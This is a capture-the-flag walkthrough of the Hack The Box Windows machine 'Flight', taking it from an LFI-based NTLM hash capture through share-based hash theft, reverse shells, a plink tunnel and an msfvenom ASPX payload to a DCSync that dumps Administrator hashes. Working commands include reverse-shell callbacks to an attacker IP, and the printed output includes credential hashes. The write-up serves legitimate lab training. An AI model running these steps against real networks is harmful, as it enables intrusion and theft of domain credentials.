Flight is a hard Windows machine that starts with a website with two different virtual hosts. One of them is vulnerable to LFI and allows an attacker to retrieve an NTLM hash. Once cracked, the obtained clear text password will be sprayed across a list of valid usernames to discover a password re-use scenario. Once the attacker has SMB access as the user s.moon he is able to write to a share that gets accessed by other users. Certain files can be used to steal the NTLMv2 hash of the users that access the share. Once the second hash is cracked the attacker will be able to write a reverse shell in a share that hosts the web files and gain a shell on the box as low privileged user. Having credentials for the user c.bum, it will be possible to gain a shell as this user, which will allow the attacker to write an aspx web shell on a web site that's configured to listen only on localhost. Once the attacker has command execution as the Microsoft Virtual Account he is able to run Rubeus to get a ticket for the machine account that can be used to perform a DCSync attack ultimately obtaining the hashes for the Administrator user.
ports=$(nmap -p- --min-rate=1000 -T4 10.129.228.120 | grep '^[0-9]'| cut -d '/' -f 1| tr '\n'','| sed s/,$//)└─$ nmap -p$ports -sC -sV 10.129.228.120
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-19 21:42 CET
Nmap scan report for 10.129.228.120
Host is up (0.12s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: g0 Aviation
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-01-20 03:42:10Z)135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: flight.htb, Site: Default-First-Site-Name)3269/tcp open tcpwrapped
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49693/tcp open msrpc Microsoft Windows RPC
58229/tcp open msrpc Microsoft Windows RPC
Service Info: Host: G0; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2026-01-20T03:43:01
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 6h59m59s
Interestigly enough we see the view parameter that includes an HTML page. If abused it can lead to LFI. Let’s check that.
After trying few things we can managed to include the PHP page itself.
<?phpini_set('display_errors',0);error_reporting(E_ERROR|E_WARNING|E_PARSE);if(isset($_GET['view'])){$file=$_GET['view'];if((strpos(urldecode($_GET['view']),'..')!==false)||(strpos(urldecode(strtolower($_GET['view'])),'filter')!==false)||(strpos(urldecode($_GET['view']),'\\')!==false)||(strpos(urldecode($_GET['view']),'htaccess')!==false)||(strpos(urldecode($_GET['view']),'.shtml')!==false)){echo"<h1>Suspicious Activity Blocked!";echo"<h3>Incident will be reported</h3>\r\n";}else{echofile_get_contents($_GET['view']);}}else{echofile_get_contents("C:\\xampp\\htdocs\\school.flight.htb\\home.html");}?>
We confirm the LFI vulnerability by including some well known Windows files such as C:/Windows/system32/drivers/etc/hosts.
# Copyright (c) 1993-2009 Microsoft Corp.## This is a sample HOSTS file used by Microsoft TCP/IP for Windows.## This file contains the mappings of IP addresses to host names. Each# entry should be kept on an individual line. The IP address should# be placed in the first column followed by the corresponding host name.# The IP address and the host name should be separated by at least one# space.## Additionally, comments (such as these) may be inserted on individual# lines or following the machine name denoted by a '#' symbol.## For example:## 102.54.94.97 rhino.acme.com # source server# 38.25.63.10 x.acme.com # x client host# localhost name resolution is handled within DNS itself.# 127.0.0.1 localhost# ::1 localhost
Let’s abuse that by pointing to a remote share which will be our attacker machine running responder.
/index.php?view=///lol.txt
With our new user credentials the only difference we see is that we have a WRITE access on the Shared share! The name indicates that this share maybe be used by others. We can try and lure users leaking their NTLMv2 hash and grab it again with responder.
For that we will use a tool called ntlm_theft.py in order to create different files for that purpose.
We put this web shell in flight or school folder and we reach out from the webpage.
We bring a powershell payload from revshells.com and we launch our nc listener. We are going to use also rlwrap for having a bit more interactive shell.
Tip
rlwrap is a readline wrapper. When you put it in front of something like nc, it adds interactive shell features that reverse shells normally lack, such as Command history (↑ ↓), Proper backspace and Cursor movement (← →).
We could look around and enumerate the host a bit. What catches our eye is the inetpub directory and while looking at the open ports we can port 8000 being open.
1
TCP0.0.0.0:80000.0.0.0:0LISTENING4
Trying to hit it with curl returns us a problem with the hostname header.
The development directory we see it has propably the pages of this website and we also check who has the rights to put files on it.
PS C:\inetpub>ls
ls
Directory:C:\inetpubModeLastWriteTimeLengthName---------------------------d-----9/22/202212:24PMcusterrd-----1/23/20265:32PMdevelopmentd-----9/22/20221:08PMhistory d-----9/22/202212:32PMlogsd-----9/22/202212:24PMtempd-----9/22/202212:28PMwwwrootPS C:\inetpub>icaclsdevelopmentdevelopmentflight\C.Bum:(OI)(CI)(W)NTSERVICE\TrustedInstaller:(I)(F)NTSERVICE\TrustedInstaller:(I)(OI)(CI)(IO)(F)NTAUTHORITY\SYSTEM:(I)(F)NTAUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)BUILTIN\Administrators:(I)(F)BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)BUILTIN\Users:(I)(RX)BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)CREATOROWNER:(I)(OI)(CI)(IO)(F)
So we need to switch to our known user C.Bum. In order to do that normally we would runas.exe but that will prompt for password which needs a GUI.
Luckily for us there is a version of the same tool for that purpose that let’s you pass commands and the password right away.
We get RunasCs and upload it to our victim host either with SMB or HTTP.
The privileges are limited and the groups doesn’t give us much. We see the WebDevs domain group which doesn’t have any more privileges as we checked bloodhound.
But it makes sense that we can edit the internal IIS web files. So let’s shift to that direction in exploiting the web app.
As we establised curl doesn’t work and we need to expose that internal service. Our goal would be to run a web shell or even better a reverse shell as the system that runs that service which hopefully would have elevated permissions. That is possible since our user now can write files into the C:\inetpub dir.
Chisel is a fast TCP/UDP tunnel, transported over HTTP, secured via SSH. Single executable including both client and server. Written in Go (golang). Chisel is mainly useful for passing through firewalls, though it can also be used to provide a secure endpoint into your network.
We will need to transfer the file to the victim and have also our version on the attacker host.
Unfortunatelly due to server problems we couldn’t upload Chisel as it’s quite big. So we needed another tunneling alternative.
For that we will use plink.
Info
Plink is a command-line interface (CLI) for the PuTTY SSH client, designed for automated, non-interactive network connections on Windows, such as SSH, Telnet, and Rlogin. It is frequently used for scripting, file transfers, and establishing secure SSH tunnels or reverse connections, often utilized in network administration or, sometimes, for evasion techniques by attackers.
For that we need also to enale SSH service in our attacker machine. We also pipe the required prompts for the ssh connection!
1
PS C:\xampp\htdocs\flight.htb> cmd.exe /c echo y | .\plink.exe -ssh -l kali -pw <ATTACKER-PASSWORD> -R 127.0.0.1:9833:127.0.0.1:8000 <ATTACKER-IP>
We make a reverse SSH connection forwarding victim port 8000 to our attacker machine on port 9833.
And we get the website!
The website doesn’t have much but in anycase we focus straight away in trying to get RCE and a shell. Website is from ASP.Net as it seems so we should use a APSX reverse shell. Let’s generate that with msfvenom.
1
2
3
4
5
6
7
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.18 LPORT=4445 -f aspx -o lol.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of aspx file: 3425 bytes
Saved as: lol.aspx
We start our listener and hit the website http://localhost:9833/lol.aspx.
We got a shell as a privileged system user and specifically iis apppool\defaultapppool is a Microsoft Virtual Account.
Info
Services that run as virtual accounts access network resources by using the credentials of the computer account in the format <domain_name><computer_name>$.
These accounts have the characteristic that when the authenticate via the network they do so as the machine account.
Let’s see that in Responder.
We cannot crack that hash as normally these passwords are really long and rotate frequently. What we can do is ask for a ticket for the machine account over the network.
Info
An alternate privilege escalation route would be with the Potato familiy of attacks.
The “user” IIS APPPOOL\DefaultAppPool is a service/virtual account. This means that is has the SeImpersonatePrivilege enabled. This privilege is associated with a family of exploits known as “potatoes”. You can read more about them here.
We get the ticket in Base64 kirbi format. We decode it cat ticket.kirbi.b64 | base64 -d > ticket.kirbi and then we need to convert it to ccache format and finally export it for kerberos use with our commands.
Finally we perform a DCSync attack telling the DC to get only the Administrator hash. We use also faketime in order to replicate DC’s time.DCSync attack
1
2
3
4
5
6
7
8
9
10
11
└─$ faketime "$(ntpdate -q flight.htb | cut -d ' ' -f 1,2)" impacket-secretsdump -k -no-pass -just-dc-user Administrator g0.flight.htb
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:43bbfc530bab76141b12c8446e30c17c:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:08c3eb806e4a83cdc660a54970bf3f3043256638aea2b62c317feffb75d89322
Administrator:aes128-cts-hmac-sha1-96:735ebdcaa24aad6bf0dc154fcdcb9465
Administrator:des-cbc-md5:c7754cb5498c2a2f
[*] Cleaning up...
To get the root flag we connect via evil-winrm with PTH.
